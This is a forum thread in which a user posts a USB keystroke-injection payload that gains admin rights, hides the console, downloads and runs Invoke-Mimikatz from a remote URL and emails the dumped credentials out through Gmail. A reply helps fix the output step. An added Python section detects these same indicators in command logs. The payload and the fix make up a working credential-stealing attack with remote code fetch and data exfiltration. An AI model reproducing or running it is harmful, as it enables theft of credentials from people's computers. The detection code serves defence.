Eno12345 Posted August 14, 2017

I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security.

DELAY 3000
REM Open an admin command prompt
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;"
ENTER
DELAY 1500
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'MyEmail1@gmail.com'
ENTER
STRING $ReportEmail.To.Add('MyEmail2@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'PassDump'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 500
REM Clear the Run history and exit
ENTER
STRING exit
ENTER

And in my email inbox all I got was an email that said the words "Invoke-Mimikatz -DumpCreds".

How do I get it so it actually sends the output of Invoke-Mimikatz instead of literally sending the words Invoke-Mimikatz? Thanks in advance.

ThoughtfulDev Posted August 17, 2017 (edited)

Use something like:

Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt';

This writes the output of Invoke-Mimikatz to your temp folder in a file named yourpcname_creds.txt, which you can then read and/or even send as an email attachment if you want.

PS: the Invoke-Mimikatz script isn't hosted on Darren's webserver - use your own host.

Edited August 17, 2017 by ThoughtfulDev: Fixed Typo
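
Seen from the defending side, the commands quoted in this thread leave recognizable strings in logged command lines and PowerShell script text. The following is an added example, not code from either poster: it tags those strings and raises an alert when a credential-dump indicator is followed by an SMTP client on the same host. The record layout, host names, 120-second window and the example.invalid URL are assumptions.

```python
import re
from datetime import datetime, timedelta

# Indicators taken from the commands quoted in this thread.
RULES = {
    "elevation": re.compile(r"Start-Process\s+\S+.*-Verb\s+runAs", re.I),
    "console_shrink": re.compile(r"mode\s+con:\s*cols=\d+\s+lines=\d+", re.I),
    "download_cradle": re.compile(r"\bIEX\b.*Net\.WebClient.*DownloadString", re.I),
    "cred_dump": re.compile(r"Invoke-Mimikatz", re.I),
    "smtp_client": re.compile(r"Net\.Mail\.SmtpClient", re.I),
}
WINDOW = timedelta(seconds=120)  # assumed correlation window, tune per environment

def tag(text):
    """Return the names of all rules that match one logged command or script block."""
    return {name for name, rx in RULES.items() if rx.search(text)}

def correlate(events):
    """Alert when a host logs cred_dump and then smtp_client within WINDOW."""
    alerts, last_dump, context = [], {}, {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        hits, host = tag(ev["text"]), ev["host"]
        context.setdefault(host, set()).update(hits)  # everything seen on this host
        if "cred_dump" in hits:
            last_dump[host] = ev["ts"]
        dumped = last_dump.get(host)
        if "smtp_client" in hits and dumped and ev["ts"] - dumped <= WINDOW:
            alerts.append({"host": host, "ts": ev["ts"],
                           "indicators": sorted(context[host])})
            del last_dump[host]  # one alert per dump
    return alerts

# Constructed sample records (host names, times and URL are made up).
T0 = datetime(2017, 8, 14, 9, 0, 0)
def _ev(host, secs, text):
    return {"host": host, "ts": T0 + timedelta(seconds=secs), "text": text}
SAMPLE = [
    _ev("WS01", 0, "powershell Start-Process cmd -Verb runAs"),
    _ev("WS01", 3, "mode con:cols=18 lines=1"),
    _ev("WS01", 5, "IEX (New-Object Net.WebClient).DownloadString("
                   "'http://example.invalid/im.ps1'); Invoke-Mimikatz -DumpCreds"),
    _ev("WS01", 9, "$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"),
    _ev("REPORT01", 20, "$c = New-Object Net.Mail.SmtpClient('smtp.corp.example', 25)"),
    _ev("WS02", 30, "Invoke-Mimikatz -DumpCreds"),
    _ev("WS02", 900, "New-Object Net.Mail.SmtpClient('smtp.corp.example', 25)"),
]

if __name__ == "__main__":
    print(correlate(SAMPLE))
```

On the sample data only WS01 alerts: REPORT01 uses an SMTP client with no preceding dump indicator, and on WS02 the SMTP client appears outside the window.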